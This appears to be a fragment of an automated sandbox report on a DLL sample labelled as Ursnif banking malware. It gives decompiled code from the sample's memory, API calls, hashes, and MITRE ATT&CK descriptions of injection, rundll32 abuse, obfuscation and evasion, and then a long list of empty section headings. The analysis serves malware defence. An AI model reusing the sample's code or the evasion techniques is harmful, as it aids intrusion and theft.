										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E6D4B41F9())) = 0x16;
					return E6D4B40C8() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}

0x6d4c5f71
0x6d4c5f71
0x6d4c5f7a
0x6d4c5f7f
0x6d4c5f82
0x6d4c5f86
0x6d4c5f95
0x6d4c5f98
0x6d4c5fb8
0x6d4c5fbd
0x6d4c5fc0
0x6d4c5fc2
0x6d4c6090
0x6d4c6096
0x6d4c60ab
0x6d4c60b7
0x6d4c60bd
0x6d4c60bf
0x6d4c60ce
0x6d4c60ce
0x6d4c60ce
0x6d4c60d1
0x6d4c60d1
0x6d4c60d5
0x6d4c60d7
0x6d4c60da
0x6d4c60da
0x6d4c60da
0x6d4c60da
0x00000000
0x6d4c60e1
0x6d4c60c6
0x00000000
0x6d4c60c6
0x6d4c6098
0x6d4c609b
0x6d4c609b
0x6d4c609e
0x6d4c609e
0x6d4c60a0
0x6d4c60a1
0x6d4c60a1
0x6d4c60a5
0x00000000
0x6d4c60a5
0x6d4c5fc8
0x6d4c5fce
0x6d4c5ffb
0x6d4c6007
0x6d4c600d
0x6d4c600f
0x00000000
0x00000000
0x6d4c6015
0x6d4c601b
0x6d4c601e
0x6d4c607a
0x6d4c607f
0x6d4c6087
0x00000000
0x6d4c6087
0x6d4c6020
0x6d4c6023
0x6d4c6025
0x6d4c6028
0x6d4c602a
0x6d4c602c
0x6d4c6062
0x6d4c6070
0x6d4c6076
0x6d4c6078
0x6d4c608c
0x00000000
0x6d4c608c
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4c602e
0x6d4c602e
0x6d4c602e
0x6d4c6031
0x6d4c6034
0x6d4c6036
0x00000000
0x00000000
0x6d4c6040
0x6d4c6047
0x6d4c604a
0x6d4c604c
0x6d4c6054
0x6d4c6054
0x6d4c6057
0x6d4c6058
0x6d4c605b
0x6d4c605d
0x00000000
0x00000000
0x00000000
0x6d4c605d
0x6d4c604e
0x6d4c604f
0x6d4c6052
0x00000000
0x00000000
0x00000000
0x6d4c6052
0x6d4c605f
0x00000000
0x6d4c605f
0x6d4c5fd0
0x6d4c5fd2
0x00000000
0x00000000
0x6d4c5fd8
0x6d4c5fdb
0x6d4c5fdf
0x6d4c5fe2
0x6d4c5fe6
0x00000000
0x00000000
0x6d4c5fec
0x6d4c5fed
0x6d4c5ff0
0x6d4c5ff2
0x00000000
0x00000000
0x00000000
0x6d4c5ff4
0x00000000
0x6d4c5fdb
0x6d4c5f9f
0x00000000
0x6d4c5faa
0x6d4c5f8c
0x6d4c5f92
0x00000000
0x6d4c5f92
0x6d4c60e9

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,286E79BA,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,286E79BA,?), ref: 6D4C6007
GetLastError.KERNEL32 ref: 6D4C6015
MultiByteToWideChar.KERNEL32(?,00000001,?,?,286E79BA,00000000), ref: 6D4C6070

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 9913c227536c78462932614380c823e4a9c5270c2b72d13ae8c883c3b2a77e52
Instruction ID: 61d72aef1f7ea1925916033413172f8c401f68437eba1a38f4e8ca5d94da0ca8
Opcode Fuzzy Hash: 9913c227536c78462932614380c823e4a9c5270c2b72d13ae8c883c3b2a77e52
Instruction Fuzzy Hash: 0B41E739604216AFDB11CF6AC844F7A7BB5EF03314F21C25DE958672A1DB318D42C7A2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 606e7fb752fbd.rar.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6444 Parent PID: 6060

General

Function 6D45D4D0, Relevance: 10.7, APIs: 7, Instructions: 155
COMMON

Function 6D4C8870, Relevance: 10.9, APIs: 7, Instructions: 370
timeCOMMON

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Function 6D4CCA10, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
COMMON

Function 6D4BDE57, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50
COMMON

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Function 6D494EA0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
COMMON

Function 6D4C240C, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Function 6D48CF76, Relevance: 10.6, APIs: 7, Instructions: 71
COMMON

Function 6D4BDEDB, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53
COMMON